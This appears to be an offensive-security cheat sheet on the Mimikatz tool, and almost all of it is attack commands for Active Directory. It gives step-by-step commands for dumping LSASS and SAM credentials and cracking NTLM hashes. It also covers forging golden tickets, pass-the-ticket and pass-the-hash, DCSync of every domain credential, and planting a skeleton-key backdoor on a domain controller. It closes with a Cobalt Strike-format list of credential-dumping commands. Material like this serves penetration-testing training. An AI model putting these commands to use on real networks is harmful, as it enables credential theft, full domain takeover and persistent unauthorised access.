MimiKatz

Used for dumping user credentials inside of a active directory network

Summary

Dumping hashes

cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary

privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly

lsadump::lsa /patch Dump those hashes!

Crack those hashes w/ hashcat

hashcat -m 1000 <hash> rockyou.txt

Golden Tickets Attack

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.

cd downloads && mimikatz.exe

privilege::debug ensure this outputs [privilege "20" ok]

lsadump::lsa /inject /name:krbtgt This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket

Create golden ticket

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

Access other machines with golden ticket

misc::cmd - This will open a new command prompt with elevated privileges to all machines

Access other Machines! - You will now have another command prompt with access to all other machines on the network

Silver Ticket

If a password of a service account is stolen, it can be used to impersonate a user

Pass the Ticket

Pass the ticket works by dumping the TGT from the LSASS memory of the machine.

cd Downloads - navigate to the directory mimikatz is in

mimikatz.exe - run mimikatz

privilege::debug - Ensure this outputs [output '20' OK] if it does not that means you do not have the administrator privileges to properly run mimikatz

sekurlsa::tickets /export - this will export all of the .kirbi tickets into the directory that you are currently in

At this step you can also use the base 64 encoded tickets from Rubeus that we harvested earlier

Take the admin one

Now that we have the ticket, we can perform a pass the ticket attack kerberos::ptt <ticket> - run this command inside of mimikatz with the ticket that you harvested from earlier. It will cache and impersonate the given ticket

klist - Here were just verifying that we successfully impersonated the ticket by listing our cached tickets.

You now have impersonated the ticket giving you the same rights as the TGT you're impersonating. To verify this we can look at the admin share.

Kerberos Backdoors

Skeleton Key

The skeleton key works by abusing the AS-REQ encrypted timestamps, the timestamp is encrypted with the users NT hash. The domain controller then tries to decrypt this timestamp with the users NT hash, once a skeleton key is implanted the domain controller tries to decrypt the timestamp using both the user NT hash and the skeleton key NT hash allowing you access to the domain forest.

cd Downloads && mimikatz.exe - Navigate to the directory mimikatz is in and run mimikatz

privilege::debug - This should be a standard for running mimikatz as mimikatz needs local administrator access

Installing Skeleton Key

misc::skeleton

Accessing the forest Example : net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz - The share will now be accessible without the need for the Administrators password

dir \\Desktop-1\c$ /user:Machine1 mimikatz - access the directory of Desktop-1 without ever knowing what users have access to Desktop-1

Commands - CheatSheet

#The commands are in cobalt strike format!

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys

#Dump SAM Database
mimikatz lsadump::sam

#Dump SECRETS Database
mimikatz lsadump::secrets

#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#List and Dump local kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list

Last updated

Was this helpful?